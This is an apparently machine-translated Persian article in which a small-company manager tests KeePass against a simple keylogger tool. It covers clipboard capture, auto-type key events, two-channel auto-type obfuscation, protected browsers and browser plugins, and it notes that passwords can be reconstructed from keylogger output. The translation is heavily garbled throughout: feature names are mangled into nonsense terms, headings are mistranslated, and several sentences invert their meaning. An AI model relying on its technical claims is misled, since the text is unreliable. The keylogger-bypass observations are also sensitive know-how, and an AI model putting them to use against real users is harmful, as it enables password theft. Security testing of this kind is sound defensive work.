Logger ساده به تغییر کلیپ بورد با فرکانس 100 بار در ثانیه پاسخ می دهد. بنابراین، رمز عبور در بافر ضربه زد و پس از آن حذف آن پس از چند ثانیه در این مورد محافظت نمی شود.

برای از بین بردن این مشکل، می توانید از اتولیت استفاده کنید.

3. Autonabam

واکنش به اتولیت Keepass بر روی فشار دادن کلید اتفاق می افتد و نه فشار دادن. این به شما اجازه می دهد تا در برابر برخی از keyloggers محافظت کنید. برای دور زدن آن در Logger ساده، یک راه اندازی اضافی وجود دارد: "Keepass auto-type". اگر فعال شود، Logger باعث می شود که کلیدها را فشار دهد.

با مسدود کردن خودکار از طریق Keepass: myloginname longpassword123.

یک ورودی در Logger ساده ثبت می شود:

Logger ساده نه به میانبرهای کلیدها توجه نمی کند. همانطور که می بینید، کلید Shift به صورت یک نماد خاص (شبیه به "+") و "؟" نمایش داده شد. تغییر هر دو قبل و بعد از حرف بزرگ منتشر می شود. با این حال، این به اندازه کافی برای درک رمز عبور است.

برای حل این مشکل، می توانید از تنظیم در KeePass "دو برابر عوارض اتلتیکیت" استفاده کنید. در این مورد، KeePass بخشی از رمز عبور را از صفحه کلید وارد می کند و قسمت از طریق کلیپ بورد، مقادیر را تکان می دهد. این به شما اجازه می دهد تا برخی از keyloggers را دور بزنید.

Logger ساده بر روی عوارض دوگانه Autonabe به شرح زیر است:

  • قرار دادن از کلیپ بورد "Ctrl + V" به نظر می رسد به عنوان "v◄؟"؛
  • arrow چپ - "٪" (کد کلید و نماد # 37)؛
  • فلش به سمت راست - "" (کد کلید و نماد # 39).
شما می توانید یک الگوریتم کوچک بنویسید و رمز عبور صحیح را با استفاده از داده ها از هر دو ویندوز بازگردانید. این تنظیم عملیات Keylogger را پیچیده می کند، اما حفاظت را تضمین نمی کند - در صورت دلخواه، رمز عبور به راحتی بازسازی می شود.

از Keylogger، که "تیز" تحت KeeBass است، به معنای حفاظت اضافی می تواند کمک کند.

4. ابزار اضافی حفاظت

در برخی از مجتمع های نرم افزاری، ویژگی هایی مانند:
  • حفاظت از ورود اطلاعات از صفحه کلید سخت افزاری؛
  • مرورگر محافظت شده
هنگامی که شما حفاظت از ورود اطلاعات را از صفحه کلید سخت افزاری Logger ساده فعال می کنید، دیگر نمیتوانید اطلاعات را در طول Autolation Keepass دریافت کنید، اگر آنها به مرورگر رمز عبور وارد شوند. در این مورد، نقطه ضعف از طریق کلیپ بورد کار خواهد کرد.

هنگام استفاده از یک مرورگر محافظت شده، دسترسی به بافر مبادله و صفحه کلید ساده Logger شکست خورد. علاوه بر این، هیچ تصاویری وجود نداشت.

به جای زندان

نگاهی به چگونگی استفاده از کارکنان ما از Keepass، من پیدا کردم:
  • uAC استفاده نمی کند
  • از اتولیت استفاده نکنید، به سادگی رمزهای عبور را از طریق بافر کپی کنید؛
  • با ترک محل کار، برنامه را باز کنید؛
  • از تنظیمات پیش فرض بدون پیکربندی سیاست های امنیتی استفاده کنید.
من یک مدیر در یک شرکت کوچک هستم، کمی برنامه نویسی را دوست دارم. من یک متخصص فنی یا متخصص در زمینه امنیت نیستم، بنابراین اگر متخصصان با تجربه تر، کمبودهای مطالعه کوچک من را نشان دهند، خوشحال خواهم شد.

من آخرین نسخه Keepass 2.36 را در ویندوز 8.1 تست کردم. در عدالت باید توجه داشت که این مشکل نه تنها مشکل Keepass است. بسیاری از نگهبانان رمز عبور دیگر با درجه بالاتر یا کمتر از قابلیت اطمینان وجود دارد، اما این موضوع مطالعه دیگری است.

پیوندها

  1. Logger ساده در Github
    // چه کسی ترسناک نیست، در آرشیو "Simplogger_For_Win64.7z"، \u200b\u200bشما می توانید Exe-Schnick را پیدا کنید. این برنامه به شما اجازه نمی دهد که یک کیبورد کامل را انجام دهید، طراحی شده برای مطالعه اهداف امنیتی و اطلاعاتی.
به روز رسانی (07/27/2017)

پلاگین برای مرورگر

همانطور که کاربر Dartraiden اشاره کرد، می توانید از ماژول استفاده کنید KeePasshttp همراه با مکمل مرورگر Passifox یا Chromeipass.. این افزونه (توسط برنامه توسعه دهنده)، از طریق HTTP، نمایشگاه های ایمن را نمایش می دهد.

این دسته به شما اجازه می دهد به طور خودکار ورود به سیستم و رمز عبور را در مرورگر پر کنید، زمانی که Keepass قفل شده است. Logger ساده در این مورد واکنش نشان نمی دهد.

نقطه ضعف Chromeipass نسل یک رمز عبور جدید است، زیرا از طریق کلیپ بورد کپی شده و روی صفحه نمایش قابل مشاهده است. در این مورد، بهتر است یک رمز عبور جدید را در Keepass خود تولید کنید.

ایجاد یک رمز عبور جدید رمز عبور

همانطور که Arthur_veber اشاره کرد:
هنگام جایگزینی جادوگر رمز عبور، و همچنین هنگام ایجاد یک جدید، حالت ایمن اعمال نمی شود.

در این مورد، Logger ساده رمز عبور وارد شده در KeePass را متوقف می کند.

صفحه کلید صفحه نمایش مجازی از تولید کننده شناخته شده کمک نمی کند، که مانند CiEpass Autonor، در یک رویداد برای فشار دادن کلیدها کار می کند.

راهنمایی در اینجا دشوار است. احتمالا شما باید توجه توسعه دهندگان را به این مشکل جلب کنید.

حملات دیگر

به عنوان اولین بار توسط کاربر QW1 اشاره شده است، اگر سیستم که در آن KeePass نصب شده است، به خطر افتاده است، علاوه بر Keylogger، می توان از آن استفاده کرد. در این مورد، فهرست اقدامات برای مقابله با حمله به وضعیت خاص بستگی دارد.

متاسفانه، غیرممکن است که تمام اقدامات حفاظتی را در یک مقاله که برای ذخیره سازی رمز عبور لازم است، برجسته کنیم.